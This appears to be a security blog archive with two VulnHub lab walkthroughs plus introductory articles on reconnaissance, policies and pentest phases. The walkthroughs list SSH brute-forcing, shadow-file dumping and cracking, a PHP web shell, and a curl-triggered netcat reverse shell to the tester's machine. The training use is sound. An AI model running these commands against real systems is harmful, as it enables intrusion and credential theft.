WALKTHROUGH: De-ICE: S1.100

24 January, 201830 March, 2019 fjaviermhacking, security, trainingLeave a comment

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.

Information
https://www.vulnhub.com/entry/de-ice-s1100,8/
Scenario
The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information.
The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.
Configuration
PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of 192.168.1.100 – no additional configuration is necessary.
Download
ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command, but in this case is going to fail, or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.1.0/24

01-netdiscover — Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. We can see a brief explanation about the challenge and not much more than that. But, we can see a very important thing here. Reading carefully the page we can see there are some email related with the company.

Head of HR: Marie Mary - marym@herot.net (On Emergency Leave)
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr.System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

We should pay special attention to the last three because they are admin users.

This gives us a few information:

Names of people that is working in the company.
Valid emails.
Examples of how they are creating usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.1.100

As we can see, there are a few port open in the training machine:

21: FTP service. And, something is not right here.
22 SSH service
25 SMTP service
80 HTTP service
110 POP3 service
143 IMAP service

Considering we do not have any other information, we need to start thinking in what we are missing. We already have some valid email, with this information we can create a list of possible users in the system. In addition, we can add users like “root” or “admin” or similar users that are always useful to have. In this case, our list can be something like:

root
admin
aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech chad.coffee

Now, that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” trying to do a dictionary attack to see if we are lucky.

medusa -h 192.168.1.100 -U users.txt -P passwds.txt -M ssh -v 4 -w 0

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@192.168.1.100

04-ssh — Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l

We can see we can use the tool “cat” to read file content. Then, let’s check the files “/etc/passwd” and “/etc/shadow”.

06-cat_shadow — Figure 6: /etc/shadow content

With a simple copy and paste we can move the content of both files to our machine to try to use “John” to discover new passwords, specially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow pasad_file.txt shadow_file.txt > root_password.txt

07-unshadow — Figure 7. unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have an operative user “aadams” we can copy the “root” credential to a file and try to break just the “root” password.

john just_root.txt

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@192.168.1.100

09-no_root_ssh — Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as “root” user using SSH. But, we are still having the “root” password and a valid user “aadams”. Let’s try to login as “root” using our valid user

10-aadams_root — Figure 10: We are root!

Usually, now that we are root we can close the case and deliver our report, but going around a little bit we can find an interesting file, and considering this is a training exercise, we can play a bit more. The file is this one

12-encripted_file — Figure 12. encripted file, maybe

bin walk salary_dec2003.csv.enc

15-binwalk — Figure 13. confirming is an excerpted file

What do we know about the file:

It is encrypted with OpenSSL.
It was in a folder only accessible by the “root” user. We can think that maybe it is going to be encrypted using the “root” password we have.
We know that we do not know the type of cipher.

We can check the type of ciphers that OpenSSL offers.

openssl enc help

18-ciphers — Figure 14. Available ciphers

Let’s try on of them out of curiosity to see how an error looks like, and after that, let’s try to figure out how to try/apply all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot

16-decripting_file — Figure 15. decripting file

I guess that it is because it is just a training environment but the one that does the job is the first one. No more attempts are needed. In the real world probably we should write a script to test all the cipher available.

17-files_content — Figure 16. File decrypted

With this our scenario finish. We have access to the machine, we have root permissions and we have decrypted the “salary” file, our job is done. It has been interesting but I thing that it is just possible because the passwords where not very strong.

Walkthrough: 21LTR: Scene 1

21 January, 201830 March, 2019 fjaviermhacking, security, trainingLeave a comment

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.

Information
https://www.vulnhub.com/entry/21ltr-scene-1,3/
Scene 1
Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com
Scope Statement
The client has defined a set of limitations for the pentest: – All tests will be restricted to the systems identified on the 192.168.2.0/24 network. – All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report – A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.
Configuration
Scenario Pentest Lab Scene 1:
This LiveCD is configured with an IP address of 192.168.2.120 – no additional configuration is necessary.
Download
ISO image
Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.2.0/24

001-netdiscover — Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. In this case the web page give us a few information and nothing interesting but, the source code os the page give us the first good information. As a comment in the page, we can find some credentials

login_pass_in_source_code — Figure 2. Credentials found in the source code

There is nothing else to do here but to be sure we are not missing some pages or folders let’s run a different tools against the web page to check it. The tool is going to be “dirb”

dirb http://192.168.2.120

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is the “/logs”. Unfortunately, returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.2.120

As we can see, there are a few port open in the training machine:

21: FTP service
22: SSH service
80: HTTP service
10001: In this point, I am not sure what is this. In addition, it does not show always in the scanner results.

Considering we have some credential, lets try to connect to the different services. There is no luck with the SSH access but the FTP allows us to connect and try to explore. Unfortunately, we can just file one file.

Considering we have found a folder “/logs” previously and we have found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

http://192.168.2.120/logs/backup_log.php

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.

At this point, I must recognize that I was a bit lost and running out of ideas, then, in the meantime I went for a walk I left the “Wireshark” tools running. Why? Because both are good ideas, go for a walk when you are block and because you never know what you can find in the network. After taking a look to the traffic I saw some (a lot) calls asking for the IP address “192.168.2.240”.

006-wireshark — Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn on again the “Wireshark” to see what happen and, I have one interesting event. Apparently the training machine wants to establish a connection with “192.168.2.240” (my machine now) with the port 10000.

007-wireshark2 — Figure 8. Wireshark results

Then, lets allow this connection to see what happen. To allow this, let’s execute “necat” and wait again.

nc -lvvp 10000 > output

Here wee can see the connection is done in some point and we have what it looks like a binary file called “output”. After a some investigation, we can see it is a “tar.gz” file (using exiftool) and we cannot find anything interesting in the file, but it is clear that it is a backup file.

008-wireshark3 — Figure 9. Wireshark result

exiftool --list output

014-downloaded file — Figure 11. Exploring backup file

Linking that in the “nmap” there is a port 10001 we do not know what it is, we have in the server a page that shows backup result messages and that we are obviously downloading a backup file, we can infer that maybe the port 10001 just open when its waiting for a response about the sent backup. To test this theory, let’s try to connect to the port 10001 when the backup is sent. Because we do not know when it is going to be send, let’s just try to connect multiple times.

while true; do nc -v 192.168.2.120 10001 && break; sleep 1; clear; done

After a few minutes, the connection is stablished and we can type a few instructions.

009-wireshark4 — Figure 12. Wireshark results

Apparently, they are doing nothing but, when we go again to the backup log messages pages we can see what we have been typing.

Then, let’s try to type something that allow us to do something useful and to have access to the training machine. Let’s try to inject a PHP on-line webcell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent 192.168.2.120/logs/backup_log.php?cmd=id

011-curl to cmd.png — Figure 14. Connection result

As we can see (end of the image) we are connected as “apache” to the training machine. Now, let’s try to have a proper shell where to execute command and take a look properly to the system. We are going to a port in our system and try to connect with a shell process from the training machine.

nc -lvvp 443

curl --silent 192.168.2.120/logs/backup_log.php?cmd=/usr/bin/nc%20192.168.2.240%20443%20-e%20/bin/sh

And, success, we have our shell.

012-remote conexion — Figure 15. Shell in the training machine

The next step it is to try to find the credential files and see their content but, unfortunately, we can just list the file “/etc/passwd” and the credentials are (I guess) in “/etc/shadow” that I cannot list.

Our next step is going around the machine to see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

authorized_keys: With the key of the authorized users to connect with SSH. In this case “hbeale”
id_rsa: The private key to connect to SSH

015-user_for_ssh — Figure 16. User with SSH access

016-private_key — Figure 17. Private key

Coping the key to our system we can try to connect.

ssh hbeale@192.168.2.120

017-ssh_to_remote — Figure 18. SSH access

Checking what command we can execute as “sudo”. We can see we can use the tools “cat” to read file content.

sudo -l

018-available_no_pass — Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

019-etc_shadow — Figure 20. /etc/shadow content

Here we can see the hash for the “root” user and copy it to a file in our system (root_password). Let’s try to increase our privileges cracking the hash with “John” (the tools John) and using one of the dictionaries that comes with Kali.

john --wordlist=rockyou.txt root_password

020-john_root — Figure 21. John’s execution

We are lucky, John has done its job properly and we have the password “formula1”. Let’s try it.

With this our scenario finish. We have access to the machine and we have root permissions, our job is done. It has been funny and frustrating but I do not thing there would be the first one without the second one.

Footprinting and Reconnaissance

12 June, 201630 March, 2019 fjaviermfootprinting, hackingLeave a comment

What is Footprinting?

Footprinting is the first phase of a penetration test. It is the process of collecting as much information as possible about a target, for identifying possible vulnerable and entry points to make effective an attack.

Attackers gather information using public resources available on the Internet, on the real world, like dumpster diving, or through social engineering. The attackers try to find specific areas where they should focus their efforts, identify vulnerabilities in the systems to select the appropriate attack methodologies and/or exploits and draw a map of the organization’s network and, in general, they need to learn as much as they can about the target and find as much information as possible that can help them in the next phases of the attack.

There are some clear objectives during the footprinting like:

Collect network information: Domain names, internal domain names, network blocks, IP addresses of the reachable systems, rogue websites, private websites, TCP and UDP services running, access control mechanism and ACLs, network protocols, VPN points, IDSes running, analog and digital phone numbers, authentication mechanisms, system enumeration, …
Collect system information: User and group names, system banners, routing tables, SNMP information, system architecture, remote system type, system name, passwords, …
Collect organization’s information: Employee details, organization’s website, company directory, location details, address and phone numbers, comments in HTML source code, security policies implemented, web server links relevant to the organization, background of the organization, new articles, press releases, …

Obviously, each attacker has its own style and its own methodology, but a very basic one, can be:

Footprinting through search engines.
Footprinting using advanced search engine hacking techniques, like Google hacking.
Footprinting through social network sites.
Website footprinting.
Email footprinting.
Competitive intelligence.
WHOIS footprinting.
DNS footprinting.
Network footprinting.
Footprinting through social engineering.

Footprinting through search engines

Attackers use search engines to extract information about a target such as technology platforms, employee details, login pages, intranet portals, etc. which can help to perform social engineering attacks and other types of advanced system attacks. Search engines caches and internet archives can give as some useful information already removed from the websites.

And think big like attackers do. We have tools like Netcraft that can gives as a lot of information about the target system like subdomains or operative systems running. We have search engines like Shodan that allow us to find specific computers or devices connected to the Internet. You can find useful information using map apps like Google Maps, Bing Maps, … Social network sites like Facebook, Linkedin, Pipl, etc. There are tons of people directories and social networks where people give all their personal details and huge amounts of personal and private information without realizing about it. Financial services web pages, job sites, forums, blogs, groups, … plenty of places to gather information about a target.

Footprinting using advanced search engine hacking techniques

Nowadays, the different search engines provide us with complex syntax to allow us to refines our searches and, in the same way this can help users to perform more accurate searches, it can allow attackers to find and extract sensitive or hidden information. Let’s take Google for example, as we can see in this page, it offers us multiple options to refine our searches and find resources that are not easily accessible. A easy way to use some of these operators, it is using the google advanced search page. This technique is very useful and very well know, we can even find pages with DB of multiple dorks to make our life even easier, like: GHDB.

Footprinting through social network sites

I have spoken about it in the first point but, I need to do it again, you can not image the huge amount of information an attacker can find through social networks. And we shouldn’t restrict our operations to searches, we can create fake profiles to lure the employees to give up their sensitive information. From users/employees point of view, an attacker can gather: contact info, location, friends lists, family lists, interests, activities, …. From a companies point of view, an attacker can gather: business strategies, product profiles, contact points for social engineering, platform/technology information, type of business, …. And more and more and more.

Website footprinting

Very interesting information can be gathered from the companies website. Software used and its version, operative system used, sub-directories and parameters, filenames, path, database field names or queries, scripting platform, contact details and CMS details. Using tools like HTTP proxies (Burp Suite, OWASP ZAP, …) we can view the request headers with info about the web page and systems running. Examining the source code we can find file system structure, contact details, script type, interesting undeleted comments, cookie’s information. And we do not need to do the search ourselves, there are some tools called web spiders that can perform the search for us. Or we can do this offline mirroring the entire website. In addition to the search engines caches, we can use archive.org to find information that was online and now has been removed. Documents with metadata information can be found here too.

Email footprinting

We can take two different paths here. The first one is to examine the email headers, in there we can find some useful information. The second path is to use email tracking tools to obtain useful information.

Competitive intelligence

Information about competitors can be very useful, especially for social engineering attacks. History of the company, company plans, experts opinions, website traffic, reputation, etc. any of this can be useful.

WHOIS footprinting

WHOIS is a database maintained by Regional Internet Registries and contain the personal information of domain owners.

DNS footprinting

Attackers can gather DNS information to determinate key hosts in the network and can perform social engineering attacks.

Footprinting through social engineering

Attackers can do things like eavesdropping, shoulder surfing, dumpster diving or impersonation on social networking sites to obtain interesting and useful information.

There are literally hundreds, probably thousands of tools useful for this phase of the attack. It will be impossible list all of them here, but I hope these lines are enough to stand out the importance of this phase.

See you.

Information security policies

8 June, 201630 March, 2019 fjaviermsecurity policiesLeave a comment

Security policies are the foundation of the security infrastructure. Sometimes, in some environments people do not consider they as important, but this is a completely wrong idea. Information security policies define the basic security requirements and rules to be implemented in order to protect and secure organizations’ information systems.

Some of the goals of the security policies are:

Maintain an outline for the management and administration of network security.
Prevent unauthorized modifications of data.
Protect an organizations’ computing resources.
Reduce risks caused by ilegal use of the system resources.
Eliminate legal liabilities arising from employees or third parties.
Differentiate the users’ access rights.
Prevent waste of companies’ computing resources.
Protect confidential, proprietary information from theft, misuse and unauthorized disclosure.

There are some different types of security policies. We can find a four types classification:

Promiscuos policy: No restrictions on usage of system resources.
Permissive policy: Policy begins wide open and only known dangerous services/attacks behaviors are blocked. This policy should be updated constantly to be effective.
Prudent policy: It provides maximum security while allowing known but necessary dangers. It blocks all services and only safe/necessary services are enabled individually. In addition, everything should be logged.
Paranoid policy: It forbids everything, not Internet connection, or severely limited Internet usage.

There are multiple examples of definition of security policies. We can list a few examples but, security policies should cover all the different areas around the utilization of information systems in our organizations:

Access control policy: It defines the resources being protected and the rules that control access to them.
Remote access policy: It defines who can have remote access, and defines access medium and remote access security controls.
Firewall management policy: It defines access, management and monitoring of firewalls in the organization.
Network connection policy: It defines who can install new resources on a network, approve the installation of new devices, document network changes, etc.
Passwords policy: It provides guidelines for using strong passwords protection on organizations’ resources.
User account policy: It defines the account creation process and authority, right and responsibilities of user accounts.
Information protection policy: It defines the sensitivity levels of information, who may have access, how is it stored and transmitted, and how should it be deleted from storage media.
Special access policy: This policy defines the terms and conditions of granting special access to system resources.
Email security policy: It is created to govern the proper usage of corporate email.
Acceptable use policy: It defines the acceptable use of system resources.
Privacy policies at workplace: It defines the access to employees’ private information by other employees.

As you can see, a lot of things are involved and needs to be defined as policies. Theses are just a few examples but, policies, as I have said, should cover everything related with our information systems.

Let’s expand a bit more the “Privacy policies at workplace”. Again, just an example. Specially in this field, part of the definition of this policy, for example, it is affected for the country legislation. This can contain things like:

Intimate employees about what information you collect, why and what you will do with it.
Limit the collection of information and collect it by fair and lawful means.
Inform employees about the potential collection, use and disclosure of personal information.
Keep employees’ personal information accurate, compete and up-to-date.
Provide employees access to their personal information.
Keep employees’ personal information secure.

There are a few steps that can/should be followed to implement this policies. Usually the security policy development team in an organization generally consist of information security team (IST), technical writer(s), technical personnel, legal counsel, human resources, audit and compliance team, and users group. The steps can be followed are:

Perform a risk assessment to identify risks to the organization’s assets.
Learn from standard guidelines and other organizations.
Include senior management and all other staff in policy development
Set clear penalties and enforce them.
Make a final version available to all of the staff in the organization.
Ensure every member of your staff read, sign and understand the policy.
Deploy tools to enforce the policies.
Train your employees and educate them about the policy.
Regularly review and update the policies.

I am sure that most people probably are in shock after read that we need to include in this policy definition the teams of human resources and legal counsel. But the thing is, despite they do not know the technical parts of the systems or even the systems, they are supposed to be experts in their areas and we are going to need them.

The human resources department is responsable to make employees aware of security policies and train them in best practices defined in the policies. They are going to work closely with management to monitor policy implementation and address any policy violation issue.

The legal team is going to help us to develop the policies. These policies should be developed in consultation with legal experts and must comply to relevant local laws. The help of this team is going to prevent the enforcement of a policy violating users rights in contravention to local laws that can result in law suits against the organization.

This is just a little introduction to policies and a few example of policies that need to be set in place. As I have said before they should cover everything around our information systems and processes in our company.

See you.

Network security zoning

8 June, 201630 March, 2019 fjaviermdmz, securityLeave a comment

The world is a wild place specially when we are talking about the Internet environment. There are multiple threads and multiple sources of attack. Organizations, in general, need to find the best ways to protect themselves and guarantee the continuity of their business online.

On of the best ways to build their defenses is creating different layers or zones in their infrastructures. Network security zoning mechanism allows an organization to manage a secure network environment by selecting the appropriate security levels for different zones of Internet and Intranet networks. It helps to effectively monitoring and controlling inbound and outbound traffic.

There are some different zones that we can define, the decision about which ones are going to be present in a concrete infrastructure needs to be carefully analyzed in each one of the cases. As a example, we are going to see a few of the possible zones we can implement.

Internet zone: Obviously, this is not a zone that we can implement, is something that it is there and we just connect. In general, we can define this zone like an uncontrolled zone that it is outside of the boundaries of our organization.
Internet DMZ: This is a controlled zone that provides a buffer between the internal network and the Internet.
Production network zone: This is a restricted zone and it has strict access controls to prevent uncontrolled traffic.
Intranet zone: It is a controlled zone with not heavy restriction, it is supposed to be in a controlled environment and only trusted systems and/or traffic can be found here.
Management network zone: Highly restricted area or zone, with strong controls and strict policies to restrict the access of non authorized users and traffic.

As you can see, this is just a basic example list to exemplify some of the different zones we can implement in our networks.

See you.

Penetration testing phases

4 June, 201610 May, 2020 fjaviermhacking, pentest, securityLeave a comment

When we talk about penetration tests, a lot of people think that it is just a matter of starting our computers, run a few tools against the objective, do a bit of magic and, done, the pentester discovers a few vulnerabilities. But the truth is far from this point of view, maybe in the films is something like that but not in real life.

A pen-testing is a well-defined process, it has its methodologies like OSSTMM, OWASP and some others. All of them, define concrete steps and procedures that a pentester should follow to perform a proper task.

One of the things that it is well defined is the different phases of a pen-testing. We can find well-defined phases, each one of them specifying what needs to be done and when it needs to be done. The tools you use to complete each one of these phases are not important in this article, in this article, it is just important the process.

We can find five different phases in a pentest. Each one with its boundaries, objectives and goals well defined. These five phases are:

Reconnaissance
Scanning
Gaining access
Maintaining access
Clearing tracks

Let see a little introduction of the different phases.

Reconnaissance

Reconnaissance refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching the attack. In other words, find all the information at our fingertips. The attackers are going to use all the public sources that they can reach to find information about the target. And we are not talking just about the company, we are talking about employees, business, operations, network, system, competitors, … everything we can learn about our target. We can use web pages, social networks, social engineering, … The objective is to know as much as we can about the victim and the elements around it.

We can find two types of reconnaissance:

Passive: Involves acquiring information without directly interact with the target.
Active: Involves interacting with the target directly by any means.

Scanning

Scanning refers to a pre-attack phase where the attacker scans the network for specific information on the basis of information gathered during the reconnaissance. In general, in this step, we are going to use port scanners, vulnerability scanners and similar tools to obtain information about the target environment like live machines, ports in each one of these machines, services running, OS details, … All this information will allow us to launch the attack.

Gaining access

Gaining access refers to the point where the attacker obtains access to a machine or application inside the target’s network. Part of this phase is when the attacker tries to escalate privileges to obtain complete control of the system or, based on the access the attacker has, it tries to compromise other systems in the network. Here we have multiple tools and different possibilities like password cracking, denial of service, buffer overflows, session hijacking, …

Maintaining access

Maintaining access refers to the phase where the attacker tries to retain the ownership of the system and make future accesses to the compromised system easier, especially in the case that the way the attacker has used to compromise the system is fixed. The attacker can do multiple things like creating users in the system, install their own applications and hide them, install backdoors, rootkits or trojans even, in some cases, the attacker can secure the compromised machine to avoid other attackers to control the machine.

Clearing tracks

Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. In this phase, the attacker tries to remove all the pieces of evidence about the machine being compromised trying to avoid, in the first place, the detection and, in second place, obstructing the prosecution.

These are the different phases of a pen-testing, and any service offered should perform all of them properly. In addition, one of the best things about performing all the phases correctly and in the adequate order is that we can use the information found in a previous phase to complete the next phase.

See you.

Types of Hackers

21 May, 201630 March, 2019 fjaviermhackingLeave a comment

One of the biggest misunderstandings usually in media when they are talking about computers, ciber attacks, hacktivism or any other sort of activities related with computers is how they call the people involved in the different activities. In general, the use the term hacker to define all the individuals related with any legal or ilegal activity. Fortunately, it looks like that each day we (the society) are making some progress labeling things.

We should know that not every person involved with computers is just a hacker. For me the definition of hacker match with:

They are people with a huge curiosity that expend their time studying and investigating about their passions, learning, understanding, discovering and creating knowledge and/or applications in one or more areas of knowledge. People that like to understand how the world works and push the limits of every device, tool or discovery.

As you can see, from my point of view, a hacker can exist in any discipline, not just in Computer Science but, today, we are going to focus our list in this concrete area.

There are different types of hacker. The list of types of hackers can be very large and depending on which environment you are it can be more or less types but, in all the list, you can find similar categories. One of these classifications is:

Black hats: Individuals with extraordinary computing skills, resorting to malicious or destructive activities where they don’t have permissions or authorization to be on the network or to do what they are doing. Typically, they are known as crackers.
White hats: Individuals professing hacker skills and using them for defensive purposes, they have permission to do things that they are supposed to be doing and they are also known as security analysts.
Gray hats: Individuals who work both offensively and defensively at various times, usually they are driven by their own believes and thought. Some times they can be acting as black hackers, sometimes as a white hackers.
Suicide hackers: Individuals who aim to bring down critical infrastructure for a “cause” and are not worried about facing jail terms or any other kind of punishment.
Script kiddies: An unskilled hacker who compromises systems by running scripts, tools and software developed by real hackers without the knowledge to understand what are they doing and why.
Cyber terrorists: Individuals with wide range of skills, motivated by religious or political beliefs to create fear by large-scale disruption of computer networks.
State sponsored hackers: Individuals employed by the government to penetrate and gain top-secret information and to damage information systems of other governments.
Hacktivist: Individuals who promote a political agenda by hacking, especially by defacing or disabling websites.

See you.

Elements of Information Security

21 May, 201630 March, 2019 fjaviermhacking, securityLeave a comment

Information security is a state of well-being of information and infrastructure in which the possibility of theft, tampering and disruption of information and services is kept low or tolerable.

The information security has the next elements:

Confidentiality: Assurance that the information is accessible only to those authorized to have access.
Integrity: The trustworthiness of data or resources in terms of preventing improper and unauthorized changes.
Availability: Assurance that the systems responsable for delivering, storing and processing information are accessible when required by the authorized users.
Authenticity: Authenticity refers to the characteristic of a communication, document or any data that ensures the quality of being genuine.
Non-repudiation: Guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message

See you.

Security threads

24 April, 201630 March, 2019 fjaviermhacking, security, threadsLeave a comment

Nowadays, we have so much technology coming out that’s being consumed by consumers or being pushed out to the consumers and, one of the main problems it’s that they have no idea how they operate. They just know that it works and they have this or that cool features but they don’t imagine that each one of these new features can come with new vulnerabilities. We can discuss here about the point that the normal user don’t need to know about vulnerabilities, security or proper configuration for the new devices or features, however this should be a thought of the past. Today, everyone should have a basic knowledge about all this stuff. It´s clear that, except in a few cases, it’s going to be a big difference between the knowledge the standard user has and the knowledge an IT person has, it’s obvious, one of them it’s just using the products and the others are managing the products and, almost all the time, doing it for companies or enterprises that expect a certain level of expertise. But, it doesn’t matter who you are or what you do, the simple and undeniable truth is that everyone nowadays should have, at least, a few knowledge about the threads they have around when they are using technology because today, technology is everywhere.

This article is focused in IT persons, but I think that it can be useful for everyone that uses technology and it’s aware that they need to know or they are just curious.

There are some different issues that can be considered threads in the world of computer security and any one involved in this world should be aware of, to try to avoid or mitigate the efects. This is just a list of threads, not an explanation of how to mitigate their effects. We can divide threads in different categories:

Host threads: An I’m not talking just about servers that are used to deploy applications, in this category fall servers, workstations, tablets and cell phones anything that have an operative system installed and can be connected to the Internet. We can have in this category things like:
- Footprinting: Every computer or every operative system answers in different ways to the same questions. This allows attackers to investigate and obtain information about our infrastructure.
- Physical security: Thinks like don’t lock your laptop when you are not around, don’t lock your screen or expend a lot of time bastioning your server when it’s quite easy to have physical access to it.
- Password threads: It shouldn’t be enough with having a password, we should have proper passwords defined in a password policy and with enough restrictions to consider them secure.
- Malware: A thread in expansion nowadays, day after day we can see more cases of malware, we should have control about what is installed in our host and what the host is executing. We shouldn’t install things just using the “Next” button without read the different screens in the wizards, this is how you end up with new bars in your browser or applications that you don’t know what they are.
- Denial of Service: It does’t matter if it’s intentional or non-intentional, the result is that your system is not going to be available, you can lose money, customers, reputation, …
- Unauthorized access: No one that it’s not allowed to use a system should be allowed to log into the system, period.
- Privilege escalation: It’s closely related with the previous one, if I can access illegitimately the system I can try to obtain more privileges in it. Creating accounts with more privileges for example.
- Backdoors: One of the things that attackers are going to do after gain access to our systems, it’s to create a backdoor to be able to return later and access the system again in a easier way. One very common way to do that is creating service accounts. For this reason this is one of the things that we should revise.

Natural and physical threads:
- Natural disasters: Earthquakes, hurricanes, floods or any other natural disaster. It’s obvious that try to prevent this kind of events it’s out of discussion but we should have the proper plans, procedures or policies to try to mitigate their effects.
- Physical threads: Like thefts, dropping the laptop or the cell phone, anything that can affect directly to the physical device. We need to be prepared to mitigate the loss of information.
- Power: Power problems can affect our devices or components, can destroy or affect data or stress our devices.
- End of life: Every device has life and in some point it needs to be retired. Maybe because is not powerful enough to match your business requirements or just because it’s too old. But any of our devices, in general, it’s going to have a HD that it has been storing our information in some point and we should take care of this. And, I’m not talking just about laptops or PCs, I’m including printers or any other device that has a HD. The wrong treatment of these devices can derivate in a leak of information.

Application threads:
- Configuration threads: Misconfigurations or default configurations can be a great threat for our devices and our organizations. We should pay attention to everything that we are configuring, it does’t matter if it’s hardware or software. We should read the manuals properly and even, if it’s necessary, look for some training.
- Buffer overflows: This is an application trying to store more information in the buffer than what intended to hold. This usually is caused by errors during the development. Any in-house development should be reviewed carefully, any open source code should be reviewed carefully and all the scripts or codes our developers or IT persons copy and paste from the Internet should be reviewed.
- Data and Input Validation: All the information coming into our application needs to be previously validated to avoid injection. Code injection, SQL injection, any injection.

Human threads: With this point we can write a book, and probably a few of them. The biggest and one of the more dangerous threads is us. We are humans and we are falible. Exists a hacking discipline focus in this kind of thread: Social engineering. How to obtain from people what you need. We need to train our people, we need to have policies and mitigation measures and we need to be prevented, there is no other way.

Network threads:
- Sniffing and Eavesdropping: Anyone can be sniffing in your network trying to obtain information to perform and attack.
- ARP Spoffing: Trying to simulate the attacker computer is the default gateway or any other interesting computer in your network.
- Denial of Service: Yes, here we have this thread again.

This is just a list of some general threads we can find around us all the time and something about we need to take care when we are auditing our systems or trying to penetrate them. I hope it´s useful, at least, to have them in the same place to review it.

See you.

Binary Coders

Blog about computer science and computer engineering

ethical-hacking

WALKTHROUGH: De-ICE: S1.100

Information

Scenario

Configuration

Download

Walkthrough: 21LTR: Scene 1

Information

Scene 1

Scope Statement

Configuration

Footprinting and Reconnaissance

Information security policies

Network security zoning

Penetration testing phases

Types of Hackers

Elements of Information Security

Security threads